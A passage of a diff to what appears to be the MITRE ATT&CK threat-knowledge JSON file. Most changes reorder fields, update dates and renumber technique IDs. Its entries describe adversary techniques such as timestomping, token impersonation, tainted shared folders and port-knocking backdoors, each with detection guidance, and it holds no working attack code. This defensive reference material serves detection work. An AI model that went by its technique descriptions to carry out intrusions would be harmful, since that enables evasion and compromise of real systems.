- "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.",
- "name": "System Owner/User Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-15T01:03:47.866Z",
- "created": "2017-05-31T21:30:35.733Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -26533,21 +27436,21 @@
],
"modified": "2020-03-15T01:05:08.805Z",
"created": "2017-05-31T21:30:21.315Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -26571,27 +27474,27 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T19:01:50.128Z",
+ "modified": "2020-06-08T23:28:29.250Z",
"created": "2020-03-10T18:23:06.482Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS"
- ],
- "x_mitre_data_sources": [
- "Windows Registry",
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn\u2019t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for command line invocations of tools capable of modifying services that doesn\u2019t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -26632,15 +27535,11 @@
],
"modified": "2020-03-27T21:18:48.149Z",
"created": "2019-10-04T20:42:28.541Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process command-line parameters",
- "Process monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
],
"x_mitre_permissions_required": [
"User",
@@ -26648,12 +27547,16 @@
"root",
"SYSTEM"
],
- "x_mitre_impact_type": [
- "Availability"
+ "x_mitre_data_sources": [
+ "Windows event logs",
+ "Process command-line parameters",
+ "Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
@@ -26699,20 +27602,20 @@
],
"modified": "2020-03-15T01:07:42.700Z",
"created": "2017-05-31T21:31:37.450Z",
- "x_mitre_version": "1.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"API monitoring"
],
- "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e",
@@ -26827,30 +27730,30 @@
],
"modified": "2020-03-25T22:13:59.473Z",
"created": "2020-01-17T16:15:19.870Z",
- "x_mitre_contributors": [
- "Tony Lambert, Red Canary"
+ "x_mitre_platforms": [
+ "Linux"
],
+ "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.",
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.",
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
]
},
{
"id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Taint Shared Content",
- "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
+ "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. 
These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -26878,28 +27781,28 @@
"phase_name": "lateral-movement"
}
],
- "modified": "2020-02-12T20:27:07.764Z",
+ "modified": "2020-03-31T22:14:56.107Z",
"created": "2017-05-31T21:31:01.759Z",
- "x_mitre_version": "1.2",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Michal Dida, ESET",
- "David Routin"
- ],
- "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Access to shared folders and content with write permissions"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_system_requirements": [
- "Access to shared folders and content with write permissions"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
+ "x_mitre_contributors": [
+ "Michal Dida, ESET",
+ "David Routin"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
@@ -26958,11 +27861,18 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T23:32:53.432Z",
+ "modified": "2020-04-29T14:37:59.462Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_contributors": [
- "Patrick Campbell, @pjcampbe11"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
+ "x_mitre_defense_bypassed": [
+ "Static File Analysis"
],
"x_mitre_data_sources": [
"Anti-virus",
@@ -26970,17 +27880,11 @@
"Network intrusion detection system",
"Web logs"
],
- "x_mitre_defense_bypassed": [
- "Static File Analysis"
+ "x_mitre_contributors": [
+ "Brian Wiltse @evalstrings",
+ "Patrick Campbell, @pjcampbe11"
],
- "x_mitre_detection": "Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -27013,24 +27917,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:40:58.149Z",
+ "modified": "2020-06-20T22:21:29.233Z",
"created": "2020-01-14T01:28:32.166Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -27069,21 +27973,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:41:25.118Z",
+ "modified": "2020-06-20T22:23:30.093Z",
"created": "2020-01-14T01:30:41.092Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -27106,30 +28010,34 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:14:03.875Z",
+ "modified": "2020-07-01T16:32:02.532Z",
"created": "2020-03-06T21:11:11.225Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team"
- ],
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
"Host forensic analysis",
"Signature-based detection",
"Static File Analysis",
"Anti-virus"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -27225,12 +28133,13 @@
],
"modified": "2020-03-25T15:24:26.476Z",
"created": "2020-01-24T15:51:52.317Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Scott Lundgren, @5twenty9, Carbon Black"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
+ "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
"x_mitre_data_sources": [
"API monitoring",
"Binary file metadata",
@@ -27239,13 +28148,12 @@
"Loaded DLLs",
"Process monitoring"
],
- "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
+ "x_mitre_contributors": [
+ "Scott Lundgren, @5twenty9, Carbon Black"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -27268,11 +28176,27 @@
"created": "2017-05-31T21:31:12.675Z"
},
{
+ "created": "2020-01-31T12:42:44.103Z",
+ "modified": "2020-03-29T21:39:46.724Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
+ "name": "Timestomp",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.006",
- "url": "https://attack.mitre.org/techniques/T1551/006"
+ "external_id": "T1070.006",
+ "url": "https://attack.mitre.org/techniques/T1070/006"
},
{
"url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html",
@@ -27280,22 +28204,6 @@
"source_name": "WindowsIR Anti-Forensic Techniques"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Timestomp",
- "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)",
- "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T21:39:46.724Z",
- "created": "2020-01-31T12:42:44.103Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -27322,6 +28230,26 @@
]
},
{
+ "created": "2020-02-18T16:39:06.289Z",
+ "modified": "2020-03-26T21:29:18.608Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
+ "name": "Token Impersonation/Theft",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27334,26 +28262,6 @@
"source_name": "Microsoft Command-line Logging"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Token Impersonation/Theft",
- "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\n\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
- "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-26T21:29:18.608Z",
- "created": "2020-02-18T16:39:06.289Z",
"x_mitre_platforms": [
"Windows"
],
@@ -27373,11 +28281,16 @@
"x_mitre_version": "1.0"
},
{
+ "revoked": false,
+ "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Traffic Signaling",
+ "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1545",
- "url": "https://attack.mitre.org/techniques/T1545"
+ "external_id": "T1205",
+ "url": "https://attack.mitre.org/techniques/T1205"
},
{
"url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
@@ -27388,10 +28301,6 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Traffic Signaling",
- "description": "Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
- "id": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27407,28 +28316,30 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-27T20:14:07.431Z",
- "created": "2020-01-22T20:18:16.952Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "modified": "2020-07-01T18:27:41.755Z",
+ "created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_contributors": [
+ "Josh Day, Gigamon"
],
"x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Packet capture"
- ],
- "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
- "x_mitre_defense_bypassed": [
- "Defensive network service scanning"
+ "Packet capture",
+ "Netflow/Enclave netflow"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Josh Day, Gigamon"
- ]
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
